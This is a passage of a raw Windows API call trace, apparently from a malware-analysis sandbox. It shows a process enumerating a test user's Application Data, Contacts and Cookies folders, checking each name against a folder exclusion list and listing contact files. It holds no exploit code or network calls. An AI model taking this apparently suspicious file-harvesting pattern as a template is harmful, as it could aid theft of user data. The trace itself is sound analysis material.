wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.940] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AppData", cchCount1=7, lpString2="AppData", cchCount2=7) returned 2 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.940] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.941] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0028.941] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.941] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.941] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.941] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.941] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.941] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e38, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9da020c, nFileSizeHigh=0x33bbc1, nFileSizeLow=0x0, dwReserved0=0x2020e1a, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0xffffffff [0028.941] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.941] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.941] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.941] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.941] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ae794, dwReserved1=0x777648, cFileName="Contacts", cAlternateFileName="")) returned 1 [0028.941] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.942] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.942] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Contacts", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0028.942] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.942] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0028.942] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.942] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.942] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x10, dwReserved1=0x777648, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x10, dwReserved1=0x777648, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x10, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.943] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x10, dwReserved1=0x777648, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x10, dwReserved1=0x777648, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.944] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.949] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x124006e, ftCreationTime.dwLowDateTime=0x36b295, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x11e006f, nFileSizeHigh=0x36b295, nFileSizeLow=0x7c1110, dwReserved0=0x10, dwReserved1=0x777648, cFileName="si\x08", cAlternateFileName="᪨{jဓĩ\x10")) returned 0 [0028.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.949] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0028.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.949] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.949] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.949] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.950] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="Cookies", cAlternateFileName="")) returned 1 [0028.950] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.950] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.950] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.950] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.950] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.950] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cookies", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0028.950] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.950] PeekMessageW (in: lpMsg=0x6ae674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae674) returned 0 [0028.950] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.950] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.950] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e50, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9d7020c, nFileSizeHigh=0x33bc44, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="᪨{jဓĩ\x10")) returned 0xffffffff [0028.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0028.951] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.951] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, 